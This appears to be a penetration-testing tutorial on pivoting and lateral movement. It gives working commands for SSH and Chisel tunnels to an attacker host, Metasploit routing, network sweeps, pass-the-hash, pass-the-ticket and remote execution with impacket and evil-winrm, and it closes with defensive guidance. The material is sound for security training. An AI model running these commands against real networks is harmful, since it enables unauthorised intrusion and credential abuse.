Advanced Pentest & Offensive
Pivoting and lateral movement — reaching internal networks via compromised host
Pivoting simulates what happens after an attacker gains initial access: the compromised machine is used as a stepping stone to reach other network segments that are normally inaccessible from the outside.
Pivoting concept
Typical scenario:
Internet → [Firewall] → DMZ (192.168.1.0/24)
└── WebServer (192.168.1.50) ← COMPROMISED
└── Internal Network (10.0.0.0/24)
├── DC (10.0.0.10)
├── DB (10.0.0.20)
└── HR (10.0.0.30)
Pivoting goal:
Attacker is at 192.168.1.50 and wants to reach 10.0.0.0/24
without direct communication to the internal network.Internal network discovery
# On the compromised host — discover interfaces and routes
ip addr show
ip route
cat /etc/hosts
arp -a # hosts that recently communicated
# Discovery sweep (without nmap on the target)
for i in $(seq 1 254); do ping -c 1 -W 1 10.0.0.$i 2>/dev/null | grep "64 bytes" & done
# With nmap running on attacker machine via pivot
nmap -sn 10.0.0.0/24 --proxies socks5://127.0.0.1:1080SSH Tunneling — fundamental technique
Local port forwarding
# Access internal service via SSH
# Redirect local port 3306 → internal DB (10.0.0.20:3306) via pivot
ssh -L 3306:10.0.0.20:3306 user@192.168.1.50
# Now, on the attack machine:
mysql -h 127.0.0.1 -P 3306 -u root -pDynamic port forwarding — SOCKS proxy
# Create SOCKS5 proxy on port 1080
ssh -D 1080 user@192.168.1.50
# Configure proxychains to use the proxy
# /etc/proxychains.conf:
# socks5 127.0.0.1 1080
# Route any tool through the pivot
proxychains nmap -sT -Pn 10.0.0.0/24
proxychains curl http://10.0.0.10
proxychains crackmapexec smb 10.0.0.0/24Metasploit — pivot with route
# In Meterpreter, after compromising 192.168.1.50
run post/multi/manage/autoroute # add routes automatically
# Or manually:
background
route add 10.0.0.0/24 [session_id]
route print
# Metasploit modules can now reach 10.0.0.0/24
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 10.0.0.0/24
run
# SOCKS proxy via Metasploit
use auxiliary/server/socks_proxy
set SRVPORT 1080
set VERSION 5
runChisel — tunneling without SSH
Useful when SSH is unavailable or filtered.
# On attacker host (server):
./chisel server -p 8080 --reverse
# On compromised host (client):
./chisel client 192.168.1.100:8080 R:1080:socks
# Result: SOCKS5 proxy at 127.0.0.1:1080 on the attack machine
# Route via proxychains as beforeLateral movement techniques
Pass-the-Hash (PTH):
Uses captured NTLM hash to authenticate without knowing the plaintext password
crackmapexec smb 10.0.0.0/24 -u administrator \
-H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
Pass-the-Ticket (PTT):
Uses a stolen Kerberos ticket to authenticate to AD services
impacket-getTGT example.local/user:password
export KRB5CCNAME=user.ccache
impacket-psexec -k -no-pass example.local/user@dc.example.local
PsExec / WMI / WinRM:
Remote execution with valid credentials
impacket-psexec administrator:password@10.0.0.10
evil-winrm -i 10.0.0.10 -u administrator -p passwordDouble pivot — chaining pivots
Attacker → Pivot1 (DMZ) → Pivot2 (Corporate Network) → Restricted Network
# Via chained SSH
ssh -L 2222:10.0.0.50:22 user@192.168.1.50
ssh -D 1080 -p 2222 user2@127.0.0.1
# Via chained proxychains
# /etc/proxychains.conf:
# socks5 127.0.0.1 1080 # first pivot
# socks5 127.0.0.1 1081 # second pivotDefense against pivoting and lateral movement
Network segmentation:
→ Separate VLANs by function (DMZ, Corporate, Industrial, DB)
→ Firewall between segments — deny all, allow only what is needed
→ Zero Trust: authenticate even on internal networks
Detection:
→ Alert on SSH connections from servers to other networks
→ Monitor port forwarding (netstat, auditd)
→ Detect tools like chisel/ngrok/frp
→ Correlate authentications from same account on multiple hosts (PTH/PTT)
Hardening:
→ Disable password auth on SSH (key-only)
→ Credential Guard (Windows) — protects LSASS from dumping
→ Protected Users group in AD — restricts NTLM/Kerberos usagePivoting reveals the true impact of a compromise. A vulnerable web server can be the entry point to the HR database.